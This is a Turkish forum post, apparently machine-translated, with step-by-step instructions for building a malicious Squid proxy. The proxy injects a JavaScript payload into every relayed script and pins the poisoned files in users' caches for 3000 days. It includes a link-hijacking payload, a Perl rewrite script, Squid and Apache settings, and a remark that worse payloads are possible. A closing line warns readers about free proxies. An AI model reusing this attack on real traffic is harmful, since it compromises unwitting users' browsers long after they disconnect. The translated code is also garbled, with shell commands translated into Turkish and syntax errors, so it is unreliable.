Bu gönderi en son Mo Xiaowen tarafından 2015-6-7 23:19 tarihinde düzenlenmiştir
Bu, SQUID'in konfigürasyonunu basitçe değiştirerek yapılabilir
SQUID nedir?
Squid, internet verilerini önbelleyere, kullanıcılardan indirme taleplerini alan ve indirilen verileri otomatik olarak işleyen bir yazılımdır. Bir kullanıcı ana sayfa indirmek istediğinde, Squid'e bir talep gönderebilir, Squid'den onun adına indirmesini ister, ardından Squid web sitesine bağlanır ve ana sayfayı ister, ardından ana sayfayı kullanıcıya gönderir ve yedek tutar; diğer kullanıcılar aynı sayfaya başvurduğunda, Squid kaydedilen yedeği hemen kullanıcıya gönderir, böylece kullanıcı hızın oldukça hızlı olduğunu hisseder. Squid HTTP, FTP, GOPHER, SSL ve WAIS gibi protokolleri proxy edebilir, Squid ise otomatik olarak yönetebiliyor ve Squid'i ihtiyacınıza göre ayarlayarak istenmeyen şeyleri filtreleyebilirsiniz.
Squid, AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 gibi birçok işletim sisteminde çalışabilir.
Uygulama çok basittir:
1. Squid'i bir Linux sunucusuna kurun.
2. Sunucunun kodunu değiştir, tüm gönderilen javascrip'e kodumuzun bir parçasını ekle ve gönder.
3. Değiştirilmiş js dosyamızın önbellek süresini mümkün olduğunca yüksek ayarlayın.
Bu yöntem, SSL etkin olan web siteleri için de geçerlidir; web sitesi güvenli olmayan bir kaynak yüklerse (örneğin HTTP sitesi için jquery gibi), çoğu tarayıcı uyarı verir, ancak çok az kişi dikkat eder.
Chema, vekili serbest bıraktıktan birkaç gün sonra 5.000'den fazla kişinin kullandığını ve çoğu kişinin proxy'yi kötü şeyler için kullandığını söyledi, çünkü proxy'yi kullandılar, bu yüzden anonim ve güvenli olduğunu düşündüler, ama proxy sunucunun da kötü şeyler yapacağını hiç beklemediler.
Kötü niyetli proxy sunucunuzu oluşturun
Zaten bir Squid proxy sunucunuz varsa, Apache gibi bir web sunucusuna da ihtiyacınız olacak.
Adım 1: Bir yük oluşturun
Tüm bağlantıları web siteme yönlendirmek için basit bir script kullanıyorum.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Adım 2: Tüm JS dosyalarını enfekte edecek bir betik yaz
/etc/squid/poison.pl
[mw_shl_code=perl,doğru]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
chomp $_;
if($_ =- /(.*.js)/i)
{
$url = 1$;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
sistem("kedi /etc/kalamar/payload.js >> /var/www/tmp/$pid-$count.js");
"http://127.0.0.1:80/tmp/$pid-$count.js" yazdır;
}
else
{
"$_" yazdır;
}
$count++;
}[/mw_shl_code]
Bu betik, sayfanın orijinal javascrip'ini almak ve t dosyasını kaldırmak için wget kullanır, ardından /etc/squid/payload.js kodu ekleyip değiştirilmiş dosyayı istemciye gönderir, ayrıca /var/www/tmp dizinini oluşturup squid'in dosya yazmasına izin vermeniz gerekir. Bu dizin değiştirilmiş js dosyalarını saklar.
Adım 3: Yukarıdaki yazıyı Squid ile birleştirin
/etc/squid/squid.conf içine ekle
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Adım 4: Önbelleği asla arızalamasın
/var/www/tmp/.htaccess
[mw_shl_code=html,doğru] ExpiresActive On
Süresi doluyorVarsayılan "erişim artı 3000 gün"[/mw_shl_code]
Bu, Apache'ye kullanıcı önbelleğini temizleyene kadar uzun bir son kullanma süresi vermesini söyler.
Bu proxy'yi bağlarsanız, herhangi bir bağlantıya tıklarsanız web siteme yönlendirileceksiniz ve daha sonra proxy'yi kullanmasanız bile önbellek yine de var olacak. Ben sadece agresif olmayan bir yük kullandım ve bu yöntemle hackerlar çok daha fazlasını yapabiliyor. Bu yüzden, kendinize ve arkadaşlarınıza ücretsiz proxy kullanmaya dikkat etmenizi hatırlatın.
|
Yayınlandı 19.01.2015 02:34:56
|
|
|
|
Yayınlandı 19.01.2015 08:48:45
|
Ev sahibi|
Yayınlandı 20.01.2015 14:36:06
|
